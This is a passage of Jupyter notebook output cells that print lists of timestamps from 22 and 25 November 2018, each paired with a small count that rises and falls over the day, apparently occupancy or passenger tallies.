"['2018-11-22 11:05:55', '11']\n",
"['2018-11-22 11:07:28', '11']\n",
"['2018-11-22 11:07:43', '11']\n",
"['2018-11-22 11:08:39', '13']\n",
"['2018-11-22 11:09:42', '12']\n",
"['2018-11-22 11:15:19', '18']\n",
"['2018-11-22 11:17:50', '19']\n",
"['2018-11-22 11:19:20', '19']\n",
"['2018-11-22 11:20:41', '23']\n",
"['2018-11-22 11:22:39', '22']\n",
"['2018-11-22 11:24:35', '26']\n",
"['2018-11-22 11:25:33', '27']\n",
"['2018-11-22 11:26:34', '26']\n",
"['2018-11-22 11:28:34', '27']\n",
"['2018-11-22 11:29:33', '28']\n",
"['2018-11-22 11:30:37', '30']\n",
"['2018-11-22 11:31:30', '29']\n",
"['2018-11-22 11:34:37', '26']\n",
"['2018-11-22 11:35:55', '26']\n",
"['2018-11-22 11:36:23', '26']\n",
"['2018-11-22 11:36:40', '26']\n",
"['2018-11-22 11:37:32', '26']\n",
"['2018-11-22 11:37:51', '26']\n",
"['2018-11-22 11:39:08', '26']\n",
"['2018-11-22 11:39:47', '26']\n",
"['2018-11-22 11:40:42', '26']\n",
"['2018-11-22 11:41:15', '26']\n",
"['2018-11-22 11:42:52', '26']\n",
"['2018-11-22 11:43:46', '25']\n",
"['2018-11-22 11:44:06', '25']\n",
"['2018-11-22 11:45:14', '25']\n",
"['2018-11-22 11:50:22', '4']\n",
"['2018-11-22 11:52:04', '0']\n",
"['2018-11-22 11:53:35', '2']\n",
"['2018-11-22 11:55:07', '11']\n",
"['2018-11-22 11:56:38', '11']\n",
"['2018-11-22 11:58:10', '11']\n",
"['2018-11-22 11:59:41', '11']\n",
"['2018-11-22 12:01:13', '12']\n",
"['2018-11-22 12:02:45', '12']\n",
"['2018-11-22 12:04:16', '12']\n",
"['2018-11-22 12:05:48', '12']\n",
"['2018-11-22 12:07:19', '13']\n",
"['2018-11-22 12:08:51', '13']\n",
"['2018-11-22 12:10:23', '20']\n",
"['2018-11-22 12:11:54', '21']\n",
"['2018-11-22 12:13:26', '21']\n",
"['2018-11-22 12:14:57', '21']\n",
"['2018-11-22 12:16:29', '22']\n",
"['2018-11-22 12:18:01', '25']\n",
"['2018-11-22 12:19:32', '31']\n",
"['2018-11-22 12:21:04', '25']\n",
"['2018-11-22 12:22:35', '29']\n",
"['2018-11-22 12:24:07', '28']\n",
"['2018-11-22 12:25:39', '32']\n",
"['2018-11-22 12:27:10', '31']\n",
"['2018-11-22 12:28:42', '30']\n",
"['2018-11-22 12:30:13', '15']\n",
"['2018-11-22 12:31:45', '16']\n",
"['2018-11-22 12:33:16', '15']\n",
"['2018-11-22 12:34:48', '12']\n",
"['2018-11-22 12:36:20', '12']\n",
"['2018-11-22 12:37:51', '11']\n",
"['2018-11-22 12:39:23', '10']\n",
"['2018-11-22 12:40:54', '10']\n",
"['2018-11-22 12:42:26', '9']\n",
"['2018-11-22 12:43:58', '9']\n",
"['2018-11-22 12:45:29', '6']\n",
"['2018-11-22 12:47:01', '6']\n",
"['2018-11-22 12:48:32', '6']\n",
"['2018-11-22 12:50:04', '4']\n",
"['2018-11-22 12:51:36', '3']\n",
"['2018-11-22 12:53:07', '2']\n",
"['2018-11-22 12:54:39', '2']\n",
"['2018-11-22 12:56:10', '2']\n",
"['2018-11-22 12:57:42', '0']\n",
"['2018-11-22 12:59:14', '0']\n",
"['2018-11-22 12:59:53', '2']\n",
"['2018-11-22 13:01:11', '2']\n",
"['2018-11-22 13:01:23', '4']\n",
"['2018-11-22 13:02:29', '4']\n",
"['2018-11-22 13:03:55', '8']\n",
"['2018-11-22 13:04:08', '8']\n",
"['2018-11-22 13:04:38', '8']\n",
"['2018-11-22 13:05:25', '8']\n",
"['2018-11-22 13:07:24', '10']\n",
"['2018-11-22 13:08:05', '10']\n",
"['2018-11-22 13:08:39', '11']\n",
"['2018-11-22 13:09:39', '11']\n",
"['2018-11-22 13:09:48', '13']\n",
"['2018-11-22 13:11:10', '11']\n",
"['2018-11-22 13:12:17', '9']\n",
"['2018-11-22 13:15:35', '15']\n",
"['2018-11-22 13:18:19', '17']\n",
"['2018-11-22 13:20:13', '17']\n",
"['2018-11-22 13:22:55', '17']\n",
"['2018-11-22 13:23:08', '21']\n",
"['2018-11-22 13:24:39', '24']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 13:25:35', '25']\n",
"['2018-11-22 13:27:19', '23']\n",
"['2018-11-22 13:28:50', '17']\n",
"['2018-11-22 13:30:00', '19']\n",
"['2018-11-22 13:31:01', '19']\n",
"['2018-11-22 13:31:34', '17']\n",
"['2018-11-22 13:34:09', '15']\n",
"['2018-11-22 13:35:04', '15']\n",
"['2018-11-22 13:35:27', '14']\n",
"['2018-11-22 13:36:04', '13']\n",
"['2018-11-22 13:37:05', '12']\n",
"['2018-11-22 13:37:51', '12']\n",
"['2018-11-22 13:39:07', '12']\n",
"['2018-11-22 13:39:47', '12']\n",
"['2018-11-22 13:40:48', '11']\n",
"['2018-11-22 13:41:22', '10']\n",
"['2018-11-22 13:43:20', '9']\n",
"['2018-11-22 13:44:40', '7']\n",
"['2018-11-22 13:45:22', '7']\n",
"['2018-11-22 13:46:21', '7']\n",
"['2018-11-22 13:50:52', '2']\n",
"['2018-11-22 13:52:03', '0']\n",
"['2018-11-22 13:53:31', '7']\n",
"['2018-11-22 13:55:00', '59']\n",
"['2018-11-22 13:56:29', '64']\n",
"['2018-11-22 13:57:57', '64']\n",
"['2018-11-22 13:59:26', '64']\n",
"['2018-11-22 14:00:55', '79']\n",
"['2018-11-22 14:02:23', '80']\n",
"['2018-11-22 14:03:52', '82']\n",
"['2018-11-22 14:05:21', '83']\n",
"['2018-11-22 14:06:49', '83']\n",
"['2018-11-22 14:08:18', '81']\n",
"['2018-11-22 14:09:47', '82']\n",
"['2018-11-22 14:11:15', '79']\n",
"['2018-11-22 14:12:44', '78']\n",
"['2018-11-22 14:14:13', '77']\n",
"['2018-11-22 14:15:41', '77']\n",
"['2018-11-22 14:17:10', '62']\n",
"['2018-11-22 14:18:39', '63']\n",
"['2018-11-22 14:20:07', '58']\n",
"['2018-11-22 14:21:36', '55']\n",
"['2018-11-22 14:23:05', '58']\n",
"['2018-11-22 14:24:34', '59']\n",
"['2018-11-22 14:26:02', '56']\n",
"['2018-11-22 14:27:31', '52']\n",
"['2018-11-22 14:29:00', '65']\n",
"['2018-11-22 14:30:28', '65']\n",
"['2018-11-22 14:31:57', '60']\n",
"['2018-11-22 14:33:26', '57']\n",
"['2018-11-22 14:34:54', '55']\n",
"['2018-11-22 14:36:23', '54']\n",
"['2018-11-22 14:37:52', '52']\n",
"['2018-11-22 14:39:20', '47']\n",
"['2018-11-22 14:40:49', '47']\n",
"['2018-11-22 14:42:18', '42']\n",
"['2018-11-22 14:43:46', '32']\n",
"['2018-11-22 14:45:15', '30']\n",
"['2018-11-22 14:46:44', '28']\n",
"['2018-11-22 14:48:12', '17']\n",
"['2018-11-22 14:49:41', '15']\n",
"['2018-11-22 14:51:10', '14']\n",
"['2018-11-22 14:52:38', '11']\n",
"['2018-11-22 14:54:07', '5']\n",
"['2018-11-22 14:55:36', '0']\n",
"['2018-11-22 14:57:05', '4']\n",
"['2018-11-22 14:57:45', '5']\n",
"['2018-11-22 14:58:02', '5']\n",
"['2018-11-22 14:58:44', '5']\n",
"['2018-11-22 14:59:18', '5']\n",
"['2018-11-22 15:00:22', '5']\n",
"['2018-11-22 15:01:08', '6']\n",
"['2018-11-22 15:01:37', '6']\n",
"['2018-11-22 15:02:45', '10']\n",
"['2018-11-22 15:04:18', '10']\n",
"['2018-11-22 15:05:02', '12']\n",
"['2018-11-22 15:05:50', '12']\n",
"['2018-11-22 15:06:37', '13']\n",
"['2018-11-22 15:07:15', '14']\n",
"['2018-11-22 15:08:52', '15']\n",
"['2018-11-22 15:09:54', '17']\n",
"['2018-11-22 15:15:19', '23']\n",
"['2018-11-22 15:18:11', '23']\n",
"['2018-11-22 15:19:30', '25']\n",
"['2018-11-22 15:21:36', '34']\n",
"['2018-11-22 15:22:33', '35']\n",
"['2018-11-22 15:24:01', '34']\n",
"['2018-11-22 15:25:38', '29']\n",
"['2018-11-22 15:27:54', '27']\n",
"['2018-11-22 15:29:53', '27']\n",
"['2018-11-22 15:32:25', '27']\n",
"['2018-11-22 15:34:50', '33']\n",
"['2018-11-22 15:36:34', '28']\n",
"['2018-11-22 15:40:40', '26']\n",
"['2018-11-22 15:41:41', '30']\n",
"['2018-11-22 15:42:48', '33']\n",
"['2018-11-22 15:43:31', '30']\n",
"['2018-11-22 15:44:45', '25']\n",
"['2018-11-22 15:45:32', '28']\n",
"['2018-11-22 15:47:15', '27']\n",
"['2018-11-22 15:48:18', '23']\n",
"['2018-11-22 15:49:08', '19']\n",
"['2018-11-22 15:50:14', '12']\n",
"['2018-11-22 15:52:16', '8']\n",
"['2018-11-22 15:53:37', '5']\n",
"['2018-11-22 15:54:25', '1']\n",
"['2018-11-22 15:55:26', '1']\n",
"['2018-11-22 16:00:50', '0']\n",
"['2018-11-22 16:01:58', '0']\n",
"['2018-11-22 16:03:15', '7']\n",
"['2018-11-22 16:04:33', '9']\n",
"['2018-11-22 16:05:50', '7']\n",
"['2018-11-22 16:07:08', '7']\n",
"['2018-11-22 16:08:26', '7']\n",
"['2018-11-22 16:09:43', '4']\n",
"['2018-11-22 16:11:01', '11']\n",
"['2018-11-22 16:12:18', '10']\n",
"['2018-11-22 16:13:36', '10']\n",
"['2018-11-22 16:14:54', '5']\n",
"['2018-11-22 16:16:11', '5']\n",
"['2018-11-22 16:17:29', '2']\n",
"['2018-11-22 16:18:46', '0']\n",
"['2018-11-22 16:20:04', '0']\n",
"['2018-11-22 16:21:22', '5']\n",
"['2018-11-22 16:22:39', '7']\n",
"['2018-11-22 16:23:57', '13']\n",
"['2018-11-22 16:25:15', '11']\n",
"['2018-11-22 16:26:32', '6']\n",
"['2018-11-22 16:27:50', '5']\n",
"['2018-11-22 16:29:07', '5']\n",
"['2018-11-22 16:30:25', '11']\n",
"['2018-11-22 16:31:43', '9']\n",
"['2018-11-22 16:33:00', '6']\n",
"['2018-11-22 16:34:18', '10']\n",
"['2018-11-22 16:35:35', '8']\n",
"['2018-11-22 16:36:53', '6']\n",
"['2018-11-22 16:38:11', '4']\n",
"['2018-11-22 16:39:28', '4']\n",
"['2018-11-22 16:40:46', '2']\n",
"['2018-11-22 16:42:04', '2']\n",
"['2018-11-22 16:43:21', '3']\n",
"['2018-11-22 16:44:39', '3']\n",
"['2018-11-22 16:45:56', '6']\n",
"['2018-11-22 16:47:14', '4']\n",
"['2018-11-22 16:48:32', '4']\n",
"['2018-11-22 16:49:49', '4']\n",
"['2018-11-22 16:51:07', '5']\n",
"['2018-11-22 16:52:24', '0']\n",
"['2018-11-22 16:53:42', '0']\n",
"['2018-11-22 16:55:00', '0']\n",
"['2018-11-22 16:56:17', '0']\n",
"['2018-11-22 16:57:35', '0']\n",
"['2018-11-22 16:58:53', '3']\n",
"['2018-11-22 16:59:22', '1']\n",
"['2018-11-22 17:01:15', '2']\n",
"['2018-11-22 17:01:53', '0']\n",
"['2018-11-22 17:02:34', '1']\n",
"['2018-11-22 17:03:52', '4']\n",
"['2018-11-22 17:04:33', '4']\n",
"['2018-11-22 17:04:55', '5']\n",
"['2018-11-22 17:05:57', '6']\n",
"['2018-11-22 17:07:36', '4']\n",
"['2018-11-22 17:07:51', '6']\n",
"['2018-11-22 17:08:21', '6']\n",
"['2018-11-22 17:09:54', '6']\n",
"['2018-11-22 17:10:05', '7']\n",
"['2018-11-22 17:11:34', '8']\n",
"['2018-11-22 17:12:40', '7']\n",
"['2018-11-22 17:15:41', '8']\n",
"['2018-11-22 17:18:00', '4']\n",
"['2018-11-22 17:20:08', '4']\n",
"['2018-11-22 17:21:56', '5']\n",
"['2018-11-22 17:23:00', '5']\n",
"['2018-11-22 17:24:19', '3']\n",
"['2018-11-22 17:25:43', '7']\n",
"['2018-11-22 17:26:58', '1']\n",
"['2018-11-22 17:28:22', '3']\n",
"['2018-11-22 17:29:34', '1']\n",
"['2018-11-22 17:30:51', '2']\n",
"['2018-11-22 17:31:49', '3']\n",
"['2018-11-22 17:35:08', '2']\n",
"['2018-11-22 17:36:18', '6']\n",
"['2018-11-22 17:36:53', '5']\n",
"['2018-11-22 17:37:20', '4']\n",
"['2018-11-22 17:38:27', '4']\n",
"['2018-11-22 17:39:10', '1']\n",
"['2018-11-22 17:40:51', '1']\n",
"['2018-11-22 17:41:49', '0']\n",
"['2018-11-22 17:42:41', '0']\n",
"['2018-11-22 17:43:13', '0']\n",
"['2018-11-22 17:45:15', '0']\n",
"['2018-11-22 17:46:24', '0']\n",
"['2018-11-22 17:46:43', '0']\n",
"['2018-11-22 17:47:45', '0']\n",
"['2018-11-22 17:52:41', '0']\n",
"['2018-11-22 17:53:51', '0']\n",
"['2018-11-22 17:55:17', '5']\n",
"['2018-11-22 17:56:43', '6']\n",
"['2018-11-22 17:58:09', '6']\n",
"['2018-11-22 17:59:36', '6']\n",
"['2018-11-22 18:01:02', '6']\n",
"['2018-11-22 18:02:28', '13']\n",
"['2018-11-22 18:03:55', '14']\n",
"['2018-11-22 18:05:21', '22']\n",
"['2018-11-22 18:06:47', '20']\n",
"['2018-11-22 18:08:13', '21']\n",
"['2018-11-22 18:09:40', '24']\n",
"['2018-11-22 18:11:06', '24']\n",
"['2018-11-22 18:12:32', '24']\n",
"['2018-11-22 18:13:59', '21']\n",
"['2018-11-22 18:15:25', '21']\n",
"['2018-11-22 18:16:51', '25']\n",
"['2018-11-22 18:18:18', '25']\n",
"['2018-11-22 18:19:44', '24']\n",
"['2018-11-22 18:21:10', '26']\n",
"['2018-11-22 18:22:36', '15']\n",
"['2018-11-22 18:24:03', '15']\n",
"['2018-11-22 18:25:29', '11']\n",
"['2018-11-22 18:26:55', '11']\n",
"['2018-11-22 18:28:22', '11']\n",
"['2018-11-22 18:29:48', '12']\n",
"['2018-11-22 18:31:14', '5']\n",
"['2018-11-22 18:32:40', '9']\n",
"['2018-11-22 18:34:07', '7']\n",
"['2018-11-22 18:35:33', '12']\n",
"['2018-11-22 18:36:59', '12']\n",
"['2018-11-22 18:38:26', '7']\n",
"['2018-11-22 18:39:52', '7']\n",
"['2018-11-22 18:41:18', '4']\n",
"['2018-11-22 18:42:45', '2']\n",
"['2018-11-22 18:44:11', '2']\n",
"['2018-11-22 18:45:37', '2']\n",
"['2018-11-22 18:47:03', '0']\n",
"['2018-11-22 18:48:30', '0']\n",
"['2018-11-22 18:49:56', '0']\n",
"['2018-11-22 18:51:22', '0']\n",
"['2018-11-22 18:52:49', '0']\n",
"['2018-11-22 18:54:15', '0']\n",
"['2018-11-22 18:55:41', '0']\n",
"['2018-11-22 18:57:08', '2']\n",
"['2018-11-22 18:57:37', '2']\n",
"['2018-11-22 18:58:19', '2']\n",
"['2018-11-22 18:58:53', '2']\n",
"['2018-11-22 18:59:11', '2']\n",
"['2018-11-22 19:00:14', '2']\n",
"['2018-11-22 19:00:45', '3']\n",
"['2018-11-22 19:01:39', '3']\n",
"['2018-11-22 19:02:20', '5']\n",
"['2018-11-22 19:04:07', '5']\n",
"['2018-11-22 19:04:47', '8']\n",
"['2018-11-22 19:05:20', '8']\n",
"['2018-11-22 19:06:53', '7']\n",
"['2018-11-22 19:07:11', '11']\n",
"['2018-11-22 19:08:08', '9']\n",
"['2018-11-22 19:09:08', '7']\n",
"['2018-11-22 19:15:23', '12']\n",
"['2018-11-22 19:17:17', '12']\n",
"['2018-11-22 19:19:17', '12']\n",
"['2018-11-22 19:20:45', '12']\n",
"['2018-11-22 19:21:37', '9']\n",
"['2018-11-22 19:23:35', '11']\n",
"['2018-11-22 19:25:09', '7']\n",
"['2018-11-22 19:27:38', '7']\n",
"['2018-11-22 19:28:22', '10']\n",
"['2018-11-22 19:28:42', '7']\n",
"['2018-11-22 19:30:16', '4']\n",
"['2018-11-22 19:31:01', '8']\n",
"['2018-11-22 19:33:49', '6']\n",
"['2018-11-22 19:34:30', '6']\n",
"['2018-11-22 19:35:26', '3']\n",
"['2018-11-22 19:36:01', '1']\n",
"['2018-11-22 19:36:58', '0']\n",
"['2018-11-22 19:37:59', '0']\n",
"['2018-11-22 19:39:32', '2']\n",
"['2018-11-22 19:40:31', '2']\n",
"['2018-11-22 19:41:21', '0']\n",
"['2018-11-22 19:41:53', '0']\n",
"['2018-11-22 19:43:44', '0']\n",
"['2018-11-22 19:44:37', '0']\n",
"['2018-11-22 19:45:16', '0']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 19:46:12', '0']\n",
"['2018-11-22 19:50:51', '0']\n",
"['2018-11-22 19:52:05', '0']\n",
"['2018-11-22 19:59:02', '2']\n",
"['2018-11-22 20:00:20', '2']\n",
"['2018-11-22 20:04:10', '3']\n",
"['2018-11-22 20:04:50', '3']\n",
"['2018-11-22 20:05:42', '4']\n",
"['2018-11-22 20:06:22', '4']\n",
"['2018-11-22 20:07:41', '5']\n",
"['2018-11-22 20:08:17', '5']\n",
"['2018-11-22 20:10:05', '4']\n",
"['2018-11-22 20:11:05', '4']\n",
"['2018-11-22 20:11:55', '5']\n",
"['2018-11-22 20:12:38', '5']\n",
"['2018-11-22 20:14:18', '4']\n",
"['2018-11-22 20:15:32', '4']\n",
"['2018-11-22 20:16:27', '7']\n",
"['2018-11-22 20:18:52', '7']\n",
"['2018-11-22 20:19:27', '8']\n",
"['2018-11-22 20:20:43', '8']\n",
"['2018-11-22 20:22:27', '8']\n",
"['2018-11-22 20:24:12', '12']\n",
"['2018-11-22 20:26:08', '12']\n",
"['2018-11-22 20:28:01', '7']\n",
"['2018-11-22 20:28:54', '9']\n",
"['2018-11-22 20:30:28', '7']\n",
"['2018-11-22 20:31:45', '9']\n",
"['2018-11-22 20:34:38', '5']\n",
"['2018-11-22 20:36:25', '6']\n",
"['2018-11-22 20:37:00', '3']\n",
"['2018-11-22 20:38:05', '9']\n",
"['2018-11-22 20:38:23', '10']\n",
"['2018-11-22 20:39:29', '10']\n",
"['2018-11-22 20:39:41', '12']\n",
"['2018-11-22 20:41:15', '14']\n",
"['2018-11-22 20:41:55', '12']\n",
"['2018-11-22 20:42:53', '12']\n",
"['2018-11-22 20:43:31', '10']\n",
"['2018-11-22 20:44:32', '3']\n",
"['2018-11-22 20:45:22', '0']\n",
"['2018-11-22 20:45:33', '0']\n",
"['2018-11-22 20:46:31', '0']\n",
"['2018-11-22 20:46:50', '0']\n",
"['2018-11-22 20:51:14', '0']\n",
"['2018-11-22 20:55:38', '0']\n",
"['2018-11-22 21:00:03', '2']\n",
"['2018-11-22 21:04:19', '2']\n",
"['2018-11-22 21:05:09', '4']\n",
"['2018-11-22 21:05:18', '4']\n",
"['2018-11-22 21:06:05', '8']\n",
"['2018-11-22 21:07:31', '11']\n",
"['2018-11-22 21:07:40', '10']\n",
"['2018-11-22 21:07:59', '11']\n",
"['2018-11-22 21:08:52', '11']\n",
"['2018-11-22 21:10:20', '13']\n",
"['2018-11-22 21:10:34', '15']\n",
"['2018-11-22 21:11:02', '15']\n",
"['2018-11-22 21:11:42', '13']\n",
"['2018-11-22 21:12:19', '14']\n",
"['2018-11-22 21:13:31', '13']\n",
"['2018-11-22 21:14:50', '15']\n",
"['2018-11-22 21:15:55', '19']\n",
"['2018-11-22 21:17:54', '18']\n",
"['2018-11-22 21:18:25', '19']\n",
"['2018-11-22 21:20:02', '19']\n",
"['2018-11-22 21:20:25', '20']\n",
"['2018-11-22 21:21:03', '19']\n",
"['2018-11-22 21:22:21', '17']\n",
"['2018-11-22 21:23:40', '19']\n",
"['2018-11-22 21:25:30', '19']\n",
"['2018-11-22 21:25:54', '19']\n",
"['2018-11-22 21:26:26', '18']\n",
"['2018-11-22 21:26:59', '16']\n",
"['2018-11-22 21:29:13', '16']\n",
"['2018-11-22 21:30:04', '16']\n",
"['2018-11-22 21:30:31', '16']\n",
"['2018-11-22 21:30:47', '14']\n",
"['2018-11-22 21:31:22', '15']\n",
"['2018-11-22 21:32:01', '11']\n",
"['2018-11-22 21:33:10', '11']\n",
"['2018-11-22 21:34:05', '5']\n",
"['2018-11-22 21:34:54', '0']\n",
"['2018-11-22 21:35:31', '0']\n",
"['2018-11-22 21:38:26', '0']\n",
"['2018-11-22 21:39:54', '0']\n",
"['2018-11-22 21:46:34', '3']\n",
"['2018-11-22 21:47:20', '3']\n",
"['2018-11-22 21:51:10', '7']\n",
"['2018-11-22 21:51:41', '7']\n",
"['2018-11-22 21:52:19', '5']\n",
"['2018-11-22 21:52:53', '6']\n",
"['2018-11-22 21:53:59', '6']\n",
"['2018-11-22 21:54:18', '4']\n",
"['2018-11-22 21:55:13', '5']\n",
"['2018-11-22 21:55:33', '4']\n",
"['2018-11-22 21:56:09', '2']\n",
"['2018-11-22 21:56:31', '2']\n",
"['2018-11-22 21:57:17', '2']\n",
"['2018-11-22 21:58:10', '2']\n",
"['2018-11-22 21:58:46', '2']\n",
"['2018-11-22 21:59:46', '2']\n",
"['2018-11-22 22:00:01', '2']\n",
"['2018-11-22 22:00:28', '2']\n",
"['2018-11-22 22:02:39', '2']\n",
"['2018-11-22 22:03:17', '2']\n",
"['2018-11-22 22:04:58', '2']\n",
"['2018-11-22 22:05:15', '2']\n",
"['2018-11-22 22:07:46', '2']\n",
"['2018-11-22 22:09:16', '2']\n",
"['2018-11-22 22:10:19', '0']\n",
"['2018-11-25 07:04:08', '3']\n",
"['2018-11-25 07:05:27', '4']\n",
"['2018-11-25 07:06:35', '4']\n",
"['2018-11-25 07:07:02', '7']\n",
"['2018-11-25 07:07:46', '9']\n",
"['2018-11-25 07:08:52', '8']\n",
"['2018-11-25 07:09:45', '9']\n",
"['2018-11-25 07:10:39', '11']\n",
"['2018-11-25 07:11:47', '11']\n",
"['2018-11-25 07:12:11', '11']\n",
"['2018-11-25 07:12:43', '11']\n",
"['2018-11-25 07:13:26', '11']\n",
"['2018-11-25 07:14:25', '11']\n",
"['2018-11-25 07:14:39', '12']\n",
"['2018-11-25 07:15:43', '13']\n",
"['2018-11-25 07:16:30', '13']\n",
"['2018-11-25 07:17:21', '13']\n",
"['2018-11-25 07:17:38', '13']\n",
"['2018-11-25 07:18:50', '13']\n",
"['2018-11-25 07:19:23', '13']\n",
"['2018-11-25 07:20:10', '13']\n",
"['2018-11-25 07:20:43', '13']\n",
"['2018-11-25 07:23:35', '5']\n",
"['2018-11-25 07:24:45', '0']\n",
"['2018-11-25 07:36:10', '5']\n",
"['2018-11-25 07:58:19', '16']\n",
"['2018-11-25 08:32:40', '5']\n",
"['2018-11-25 08:33:14', '16']\n",
"['2018-11-25 08:36:58', '16']\n",
"['2018-11-25 08:37:34', '16']\n",
"['2018-11-25 08:38:20', '16']\n",
"['2018-11-25 08:38:52', '18']\n",
"['2018-11-25 08:40:39', '18']\n",
"['2018-11-25 08:41:42', '18']\n",
"['2018-11-25 08:43:04', '18']\n",
"['2018-11-25 08:43:26', '19']\n",
"['2018-11-25 08:44:48', '19']\n",
"['2018-11-25 08:45:15', '20']\n",
"['2018-11-25 08:47:14', '19']\n",
"['2018-11-25 08:48:36', '17']\n",
"['2018-11-25 08:49:45', '17']\n",
"['2018-11-25 08:50:56', '17']\n",
"['2018-11-25 08:51:15', '17']\n",
"['2018-11-25 08:51:43', '16']\n",
"['2018-11-25 08:52:39', '17']\n",
"['2018-11-25 08:54:25', '15']\n",
"['2018-11-25 08:56:17', '12']\n",
"['2018-11-25 08:57:16', '12']\n",
"['2018-11-25 08:58:13', '10']\n",
"['2018-11-25 08:59:39', '10']\n",
"['2018-11-25 09:01:09', '4']\n",
"['2018-11-25 09:03:44', '4']\n",
"['2018-11-25 09:05:38', '4']\n",
"['2018-11-25 09:06:24', '4']\n",
"['2018-11-25 09:07:02', '3']\n",
"['2018-11-25 09:07:54', '3']\n",
"['2018-11-25 09:08:28', '2']\n",
"['2018-11-25 09:09:11', '2']\n",
"['2018-11-25 09:10:21', '2']\n",
"['2018-11-25 09:11:06', '2']\n",
"['2018-11-25 09:11:47', '1']\n",
"['2018-11-25 09:12:29', '1']\n",
"['2018-11-25 09:13:05', '1']\n",
"['2018-11-25 09:14:00', '1']\n",
"['2018-11-25 09:14:30', '1']\n",
"['2018-11-25 09:14:53', '1']\n",
"['2018-11-25 09:15:28', '1']\n",
"['2018-11-25 09:22:06', '1']\n",
"['2018-11-25 09:28:44', '0']\n",
"['2018-11-25 09:35:22', '2']\n",
"['2018-11-25 09:35:56', '3']\n",
"['2018-11-25 09:36:55', '6']\n",
"['2018-11-25 09:37:06', '6']\n",
"['2018-11-25 09:38:05', '6']\n",
"['2018-11-25 09:38:52', '8']\n",
"['2018-11-25 09:39:36', '8']\n",
"['2018-11-25 09:40:01', '9']\n",
"['2018-11-25 09:41:07', '9']\n",
"['2018-11-25 09:42:33', '13']\n",
"['2018-11-25 09:43:15', '13']\n",
"['2018-11-25 09:43:49', '17']\n",
"['2018-11-25 09:45:19', '17']\n",
"['2018-11-25 09:45:34', '17']\n",
"['2018-11-25 09:47:22', '17']\n",
"['2018-11-25 09:48:07', '17']\n",
"['2018-11-25 09:49:49', '14']\n",
"['2018-11-25 09:54:34', '15']\n",
"['2018-11-25 09:55:55', '16']\n",
"['2018-11-25 09:57:32', '15']\n",
"['2018-11-25 09:58:22', '15']\n",
"['2018-11-25 09:59:45', '18']\n",
"['2018-11-25 10:00:46', '18']\n",
"['2018-11-25 10:01:11', '17']\n",
"['2018-11-25 10:01:58', '18']\n",
"['2018-11-25 10:02:53', '18']\n",
"['2018-11-25 10:03:48', '18']\n",
"['2018-11-25 10:05:20', '18']\n",
"['2018-11-25 10:06:27', '18']\n",
"['2018-11-25 10:06:58', '18']\n",
"['2018-11-25 10:07:26', '18']\n",
"['2018-11-25 10:07:46', '16']\n",
"['2018-11-25 10:08:25', '17']\n",
"['2018-11-25 10:09:07', '15']\n",
"['2018-11-25 10:10:51', '15']\n",
"['2018-11-25 10:11:22', '15']\n",
"['2018-11-25 10:12:06', '15']\n",
"['2018-11-25 10:13:05', '15']\n",
"['2018-11-25 10:16:29', '4']\n",
"['2018-11-25 10:17:31', '0']\n",
"['2018-11-25 10:32:44', '2']\n",
"['2018-11-25 10:33:22', '5']\n",
"['2018-11-25 10:36:49', '5']\n",
"['2018-11-25 10:38:03', '7']\n",
"['2018-11-25 10:38:50', '7']\n",
"['2018-11-25 10:39:20', '11']\n",
"['2018-11-25 10:41:13', '11']\n",
"['2018-11-25 10:41:25', '12']\n",
"['2018-11-25 10:42:50', '12']\n",
"['2018-11-25 10:43:44', '11']\n",
"['2018-11-25 10:44:22', '11']\n",
"['2018-11-25 10:45:18', '13']\n",
"['2018-11-25 10:45:59', '14']\n",
"['2018-11-25 10:47:09', '14']\n",
"['2018-11-25 10:48:28', '14']\n",
"['2018-11-25 10:49:35', '14']\n",
"['2018-11-25 10:50:50', '14']\n",
"['2018-11-25 10:51:54', '18']\n",
"['2018-11-25 10:53:45', '18']\n",
"['2018-11-25 10:54:34', '14']\n",
"['2018-11-25 10:55:53', '11']\n",
"['2018-11-25 10:57:36', '11']\n",
"['2018-11-25 10:59:38', '8']\n",
"['2018-11-25 11:00:35', '9']\n",
"['2018-11-25 11:04:35', '2']\n",
"['2018-11-25 11:07:27', '6']\n",
"['2018-11-25 11:08:34', '7']\n",
"['2018-11-25 11:10:21', '2']\n",
"['2018-11-25 11:11:34', '2']\n",
"['2018-11-25 11:12:30', '2']\n",
"['2018-11-25 11:13:09', '2']\n",
"['2018-11-25 11:13:25', '2']\n",
"['2018-11-25 11:14:34', '2']\n",
"['2018-11-25 11:15:20', '2']\n",
"['2018-11-25 11:16:00', '1']\n",
"['2018-11-25 11:16:44', '1']\n",
"['2018-11-25 11:17:17', '1']\n",
"['2018-11-25 11:18:15', '1']\n",
"['2018-11-25 11:19:16', '0']\n",
"['2018-11-25 11:19:37', '0']\n",
"['2018-11-25 11:20:07', '0']\n",
"['2018-11-25 11:24:41', '0']\n",
"['2018-11-25 11:29:15', '0']\n",
"['2018-11-25 11:33:49', '1']\n",
"['2018-11-25 11:34:24', '2']\n",
"['2018-11-25 11:35:10', '3']\n",
"['2018-11-25 11:35:57', '8']\n",
"['2018-11-25 11:36:59', '8']\n",
"['2018-11-25 11:37:48', '9']\n",
"['2018-11-25 11:38:29', '8']\n",
"['2018-11-25 11:38:56', '8']\n",
"['2018-11-25 11:40:00', '8']\n",
"['2018-11-25 11:41:41', '8']\n",
"['2018-11-25 11:42:32', '8']\n",
"['2018-11-25 11:43:19', '10']\n",
"['2018-11-25 11:43:48', '10']\n",
"['2018-11-25 11:43:59', '7']\n",
"['2018-11-25 11:45:20', '10']\n",
"['2018-11-25 11:46:28', '11']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 11:50:01', '16']\n",
"['2018-11-25 11:52:17', '13']\n",
"['2018-11-25 11:53:11', '14']\n",
"['2018-11-25 11:54:25', '13']\n",
"['2018-11-25 11:55:34', '7']\n",
"['2018-11-25 11:57:11', '10']\n",
"['2018-11-25 11:59:00', '10']\n",
"['2018-11-25 12:00:17', '10']\n",
"['2018-11-25 12:00:53', '10']\n",
"['2018-11-25 12:01:17', '10']\n",
"['2018-11-25 12:02:18', '10']\n",
"['2018-11-25 12:03:27', '10']\n",
"['2018-11-25 12:04:46', '9']\n",
"['2018-11-25 12:05:33', '10']\n",
"['2018-11-25 12:06:36', '9']\n",
"['2018-11-25 12:06:49', '8']\n",
"['2018-11-25 12:07:55', '8']\n",
"['2018-11-25 12:08:39', '8']\n",
"['2018-11-25 12:09:50', '8']\n",
"['2018-11-25 12:10:51', '8']\n",
